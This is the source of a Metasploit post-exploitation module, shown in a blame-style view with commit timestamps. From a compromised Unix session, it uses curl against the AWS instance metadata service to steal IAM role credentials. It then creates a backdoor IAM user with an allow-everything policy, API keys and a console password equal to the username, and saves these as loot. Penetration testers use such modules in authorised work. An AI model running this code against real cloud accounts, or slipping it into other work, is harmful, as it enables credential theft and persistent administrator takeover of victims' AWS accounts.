2016-12-07 01:10:34 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-11-22 22:55:03 +00:00
|
|
|
require 'msf/core'
|
|
|
|
require 'metasploit/framework/aws/client'
|
2016-12-08 22:25:07 +00:00
|
|
|
require 'json'
|
2016-11-22 22:55:03 +00:00
|
|
|
|
|
|
|
class MetasploitModule < Msf::Post
|
|
|
|
|
|
|
|
include Metasploit::Framework::Aws::Client
|
|
|
|
|
2016-12-07 01:10:34 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(
|
|
|
|
update_info(
|
|
|
|
info,
|
|
|
|
'Name' => "Create an AWS IAM User",
|
|
|
|
'Description' => %q{
|
|
|
|
This module will attempt to create an AWS (Amazon Web Services) IAM
|
|
|
|
(Identity and Access Management) user with Admin privileges.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Platform' => %w(unix),
|
|
|
|
'SessionTypes' => %w(shell meterpreter),
|
2016-12-08 20:56:00 +00:00
|
|
|
'Author' => [
|
|
|
|
'Javier Godinez <godinezj[at]gmail.com>',
|
|
|
|
'Jon Hart <jon_hart@rapid7.com>'
|
|
|
|
],
|
2016-12-07 01:10:34 +00:00
|
|
|
'References' => [
|
|
|
|
[ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
|
|
|
|
]
|
|
|
|
)
|
|
|
|
)
|
2016-11-22 22:55:03 +00:00
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2016-12-07 01:39:37 +00:00
|
|
|
OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', '']),
|
2016-12-08 20:56:00 +00:00
|
|
|
OptBool.new('CREATE_API', [true, 'Add access key ID and secret access key to account (API, CLI, and SDK access)', true]),
|
|
|
|
OptBool.new('CREATE_CONSOLE', [true, 'Create an account with a password for accessing the AWS management console', true]),
|
2016-12-07 01:39:37 +00:00
|
|
|
OptString.new('AccessKeyId', [false, 'AWS access key', '']),
|
|
|
|
OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
|
|
|
|
OptString.new('Token', [false, 'AWS session token', ''])
|
2016-12-07 01:10:34 +00:00
|
|
|
]
|
|
|
|
)
|
2016-11-22 22:55:03 +00:00
|
|
|
register_advanced_options(
|
|
|
|
[
|
2016-11-29 00:32:26 +00:00
|
|
|
OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
|
2016-12-07 00:29:00 +00:00
|
|
|
OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
|
|
|
|
OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
|
|
|
|
OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
|
|
|
|
OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
|
|
|
|
OptString.new('Region', [true, 'The default region', 'us-east-1' ])
|
2016-12-07 01:10:34 +00:00
|
|
|
]
|
|
|
|
)
|
2016-11-22 22:55:03 +00:00
|
|
|
deregister_options('VHOST')
|
|
|
|
end
|
|
|
|
|
2016-12-08 20:56:00 +00:00
|
|
|
def setup
|
|
|
|
if !(datastore['CREATE_API'] || datastore['CREATE_CONSOLE'])
|
|
|
|
fail_with(Failure::BadConfig, "Must set one or both of CREATE_API and CREATE_CONSOLE")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2016-11-22 22:55:03 +00:00
|
|
|
def run
|
|
|
|
# setup creds for making IAM API calls
|
|
|
|
creds = metadata_creds
|
|
|
|
if datastore['AccessKeyId'].empty?
|
2016-11-29 19:08:55 +00:00
|
|
|
unless creds.include?('AccessKeyId')
|
2016-11-23 18:58:37 +00:00
|
|
|
print_error("Could not find creds")
|
2016-11-22 22:55:03 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
else
|
|
|
|
creds = {
|
|
|
|
'AccessKeyId' => datastore['AccessKeyId'],
|
2016-12-07 18:16:41 +00:00
|
|
|
'SecretAccessKey' => datastore['SecretAccessKey']
|
2016-11-22 22:55:03 +00:00
|
|
|
}
|
2016-12-07 18:16:41 +00:00
|
|
|
creds['Token'] = datastore['Token'] unless datastore['Token'].blank?
|
2016-11-22 22:55:03 +00:00
|
|
|
end
|
|
|
|
|
2016-12-08 20:56:00 +00:00
|
|
|
results = {}
|
|
|
|
|
2016-11-22 22:55:03 +00:00
|
|
|
# create user
|
2016-12-07 00:29:00 +00:00
|
|
|
username = datastore['IAM_USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
|
2016-11-22 22:55:03 +00:00
|
|
|
print_status("Creating user: #{username}")
|
|
|
|
action = 'CreateUser'
|
|
|
|
doc = call_iam(creds, 'Action' => action, 'UserName' => username)
|
|
|
|
print_results(doc, action)
|
2016-12-08 20:56:00 +00:00
|
|
|
results['UserName'] = username
|
2016-11-22 22:55:03 +00:00
|
|
|
|
|
|
|
# create group
|
2016-12-08 20:56:00 +00:00
|
|
|
groupname = username
|
|
|
|
print_status("Creating group: #{groupname}")
|
2016-11-22 22:55:03 +00:00
|
|
|
action = 'CreateGroup'
|
2016-12-08 20:56:00 +00:00
|
|
|
doc = call_iam(creds, 'Action' => action, 'GroupName' => groupname)
|
2016-11-22 22:55:03 +00:00
|
|
|
print_results(doc, action)
|
2016-12-08 20:56:00 +00:00
|
|
|
results['GroupName'] = groupname
|
2016-11-22 22:55:03 +00:00
|
|
|
|
|
|
|
# create group policy
|
2016-12-08 20:56:00 +00:00
|
|
|
policyname = username
|
|
|
|
print_status("Creating group policy: #{policyname}")
|
2016-11-22 22:55:03 +00:00
|
|
|
pol_doc = datastore['IAM_GROUP_POL']
|
|
|
|
action = 'PutGroupPolicy'
|
2016-12-08 20:56:00 +00:00
|
|
|
doc = call_iam(creds, 'Action' => action, 'GroupName' => groupname, 'PolicyName' => policyname, 'PolicyDocument' => URI.encode(pol_doc))
|
2016-11-22 22:55:03 +00:00
|
|
|
print_results(doc, action)
|
|
|
|
|
|
|
|
# add user to group
|
2016-12-08 20:56:00 +00:00
|
|
|
print_status("Adding user (#{username}) to group: #{groupname}")
|
2016-11-22 22:55:03 +00:00
|
|
|
action = 'AddUserToGroup'
|
2016-12-08 20:56:00 +00:00
|
|
|
doc = call_iam(creds, 'Action' => action, 'UserName' => username, 'GroupName' => groupname)
|
2016-11-22 22:55:03 +00:00
|
|
|
print_results(doc, action)
|
|
|
|
|
|
|
|
|
2016-12-08 20:56:00 +00:00
|
|
|
if datastore['CREATE_API']
|
|
|
|
# create API keys
|
|
|
|
print_status("Creating API Keys for #{username}")
|
|
|
|
action = 'CreateAccessKey'
|
|
|
|
response = call_iam(creds, 'Action' => action, 'UserName' => username)
|
|
|
|
doc = print_results(response, action)
|
|
|
|
results['SecretAccessKey'] = doc['SecretAccessKey']
|
|
|
|
results['AccessKeyId'] = doc['AccessKeyId']
|
|
|
|
end
|
|
|
|
|
|
|
|
if datastore['CREATE_CONSOLE']
|
|
|
|
print_status("Creating password for #{username}")
|
|
|
|
password = username
|
|
|
|
action = 'CreateLoginProfile'
|
|
|
|
response = call_iam(creds, 'Action' => action, 'UserName' => username, 'Password' => password)
|
|
|
|
doc = print_results(response, action)
|
|
|
|
results['Password'] = password
|
|
|
|
end
|
|
|
|
|
|
|
|
action = 'GetUser'
|
|
|
|
response = call_iam(creds, 'Action' => action, 'UserName' => username)
|
|
|
|
doc = print_results(response, action)
|
|
|
|
arn = doc['Arn']
|
|
|
|
results['AccountId'] = arn[/^arn:aws:iam::(\d+):/,1]
|
|
|
|
|
|
|
|
keys = results.keys
|
|
|
|
table = Rex::Text::Table.new(
|
|
|
|
'Header' => "AWS Account Information",
|
|
|
|
'Columns' => keys
|
|
|
|
)
|
|
|
|
table << results.values
|
|
|
|
print_line(table.to_s)
|
|
|
|
|
|
|
|
if results.key?('AccessKeyId')
|
|
|
|
print_good("AWS CLI/SDK etc can be accessed by configuring with the above listed values")
|
|
|
|
end
|
|
|
|
|
|
|
|
if results.key?('Password')
|
|
|
|
print_good("AWS console URL https://#{results['AccountId']}.signin.aws.amazon.com/console may be used to access this account")
|
|
|
|
end
|
|
|
|
|
2016-12-08 22:25:07 +00:00
|
|
|
path = store_loot('AWS credentials', 'text/plain', session, JSON.pretty_generate(results))
|
2016-12-08 20:56:00 +00:00
|
|
|
print_good("AWS loot stored at: " + path)
|
2016-11-22 22:55:03 +00:00
|
|
|
end
|
2016-11-25 05:03:38 +00:00
|
|
|
|
|
|
|
def metadata_creds
|
|
|
|
# TODO: do it for windows/generic way
|
|
|
|
cmd_out = cmd_exec("curl --version")
|
|
|
|
if cmd_out =~ /^curl \d/
|
|
|
|
url = "http://#{datastore['METADATA_IP']}/2012-01-12/meta-data/"
|
|
|
|
print_status("#{datastore['METADATA_IP']} - looking for creds...")
|
|
|
|
resp = cmd_exec("curl #{url}")
|
|
|
|
if resp =~ /^iam.*/
|
|
|
|
resp = cmd_exec("curl #{url}iam/")
|
|
|
|
if resp =~ /^security-credentials.*/
|
|
|
|
resp = cmd_exec("curl #{url}iam/security-credentials/")
|
|
|
|
json_out = cmd_exec("curl #{url}iam/security-credentials/#{resp}")
|
|
|
|
begin
|
|
|
|
return JSON.parse(json_out)
|
|
|
|
rescue JSON::ParserError
|
|
|
|
print_error "Could not parse JSON output"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error cmd_out
|
|
|
|
end
|
|
|
|
{}
|
|
|
|
end
|
2016-11-22 22:55:03 +00:00
|
|
|
end
|